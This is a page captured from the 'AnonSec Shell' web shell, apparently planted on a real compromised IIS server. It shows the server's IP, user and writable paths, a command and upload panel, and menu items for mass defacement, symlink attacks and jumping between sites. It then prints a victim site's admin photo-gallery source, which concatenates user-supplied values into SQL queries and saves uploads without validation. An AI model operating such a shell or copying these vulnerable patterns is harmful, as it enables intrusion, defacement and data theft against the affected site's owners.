AnonSec Shell
Server IP : 199.79.62.161  /  Your IP : 216.73.216.245   [ Reverse IP ]
Web Server : Microsoft-IIS/10.0
System : Windows NT MDUS-PP-WB12 10.0 build 20348 (Windows Server 2022) AMD64
User : IWPD_5096(nirmaowd) ( 0)
PHP Version : 8.3.30
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  D:/INETPUB/VHOSTS/nirmalamatha.edu.in/ponnuguruvayurappan.org/Admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : D:/INETPUB/VHOSTS/nirmalamatha.edu.in/ponnuguruvayurappan.org/Admin//add_photogallery.aspx.cs
using System;
using System.Drawing;
using System.Web.UI.WebControls;
using System.Data.SqlClient;
using System.Configuration;
using System.Data;

public partial class admin_add_photogallery : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        if(!IsPostBack)
        {
            GV_PHOTOGALLERY.Visible = false;
            txt_DisplayOrder.Text = "0";

            if (Request.QueryString["msg"] == "" || Request.QueryString["msg"] == null)
                div_msg.Visible = false;
            else
                div_msg.Visible = true;
        }
    }

    protected void btnUpload_Click(object sender, EventArgs e)
    {
        if (FU_Attachments.HasFile)
        {

            try
            {
                if (WritetoDB() > 0)
                {
                    lbl_messages.ForeColor = Color.Green;
                    lbl_messages.Text = "<div class=\"alert alert-success\">Successfully Added.<br /></div>";

                    GV_PHOTOGALLERY.Visible = true;
                    ADS_DataSource.SelectCommand = "SELECT * FROM [PHOTOGALLERY] WHERE GID=" + DDL_PGGroup.SelectedValue + " ORDER BY [PGID] DESC";
                    GV_PHOTOGALLERY.DataBind();
                }
                else
                {
                    lbl_messages.Text = "<div class=\"alert alert-danger\">Please Try Later.<br /></div>";
                }

            }
            catch (Exception info)
            {
                throw info;
            }
        }
        else
        {
            lbl_messages.Text += "<div class=\"alert alert-danger\">Please select file.<br /></div>";
        }
    }

    protected void DDL_PGGroup_SelectedIndexChanged(object sender, EventArgs e)
    {
        lbl_messages.Text = string.Empty;
        lbl_deletemessage.Text = string.Empty;

        GV_PHOTOGALLERY.Visible = true;
        ADS_DataSource.SelectCommand = "SELECT * FROM [PHOTOGALLERY] WHERE GID=" + DDL_PGGroup.SelectedValue + " ORDER BY [Display]";
        GV_PHOTOGALLERY.DataBind();

    }

    public int WritetoDB()
    {
        //********* add to db
        SqlConnection dbConn = new SqlConnection(ConfigurationManager.ConnectionStrings["myconnectionstring"].ConnectionString);
        SqlDataAdapter dbAdapt = new SqlDataAdapter("SELECT  TOP 1 * FROM [PHOTOGALLERY] ORDER BY PGID DESC", dbConn);

        // We need this to get an ID back from the database
        dbAdapt.MissingSchemaAction = MissingSchemaAction.AddWithKey;

        // Create and initialize CommandBuilder
        SqlCommandBuilder dbCB = new SqlCommandBuilder(dbAdapt);
        // Open Connection
        dbConn.Open();

        // New DataSet
        DataSet dbSet = new DataSet();

        // Populate DataSet with data
        dbAdapt.Fill(dbSet, "temp");

        // Get reference to our table
        DataTable dbTable = dbSet.Tables["temp"];

        // Create new row
        string oldid = "";
        if (dbTable.Rows.Count > 0)
        {
            oldid = dbTable.Rows[0]["PGID"].ToString();
        }
        if (oldid == "")
            oldid = "1";

        DataRow dbRow = dbTable.NewRow();

        // Store data in the row

        dbRow["GID"] = int.Parse(DDL_PGGroup.SelectedValue);
        dbRow["Display"] = int.Parse(txt_DisplayOrder.Text);

        string filePath = "";
        string savePath = Server.MapPath("/assets/uploads/");
        string fileName = "";

        Random r = new Random();
        int rno = r.Next(10000, 99999);

        if (FU_Attachments.HasFile)
        {

            fileName = "ponnuguruvayurappan-" + rno + "-" + System.Text.RegularExpressions.Regex.Replace(FU_Attachments.FileName, @"\s+", "-");
            filePath = savePath + fileName;

            if (filePath != "")
            {
                FU_Attachments.SaveAs(filePath);

                if (fileName != "")
                    dbRow["Filename"] = fileName;
                else
                    dbRow["Filename"] = null;

            }
        }

        dbTable.Rows.Add(dbRow);
        int stat = dbAdapt.Update(dbSet, "temp");
        dbConn.Close();

        return stat;
        //********* end of save to db
    }

    protected void GV_PHOTOGALLERY_RowDeleted(object sender, GridViewDeletedEventArgs e)
    {
        lbl_messages.Text = "";
        lbl_deletemessage.Text = "";

        if (e.AffectedRows > 0)
        {
            lbl_deletemessage.Text += " <div class=\"alert alert-danger\">Photogallery deleted successfully.<br /></div>";

            GV_PHOTOGALLERY.Visible = true;
            ADS_DataSource.SelectCommand = "SELECT * FROM [PHOTOGALLERY] WHERE GID=" + this.DDL_PGGroup.SelectedValue + " ORDER BY [PGID] DESC";
            GV_PHOTOGALLERY.DataBind();
        }
        else
        {
            lbl_deletemessage.Text += " <div class=\"alert alert-danger\">Photogallery couldn't be deleted.<br /></div>";

            GV_PHOTOGALLERY.Visible = true;
            ADS_DataSource.SelectCommand = "SELECT * FROM [PHOTOGALLERY] WHERE GID=" + this.DDL_PGGroup.SelectedValue + " ORDER BY [PGID] DESC";
            GV_PHOTOGALLERY.DataBind();
        }
    }

    protected void GV_PHOTOGALLERY_RowDeleting(object sender, GridViewDeleteEventArgs e)
    {
        int PGID = Convert.ToInt32(GV_PHOTOGALLERY.DataKeys[e.RowIndex].Value);

        try
        {
            HiddenField hf_Filename = (HiddenField)GV_PHOTOGALLERY.Rows[e.RowIndex].FindControl("hf_Filename");

            if (hf_Filename.Value != "")
            {
                try
                {
                    System.IO.File.Delete(Server.MapPath("//ponnuguruvayurappan.org/assets/uploads\\" + hf_Filename.Value));
                }
                catch (Exception) { }
            }

        }
        catch (Exception ex)
        { }
    }

  
}

Anon7 - 2022
AnonSec Team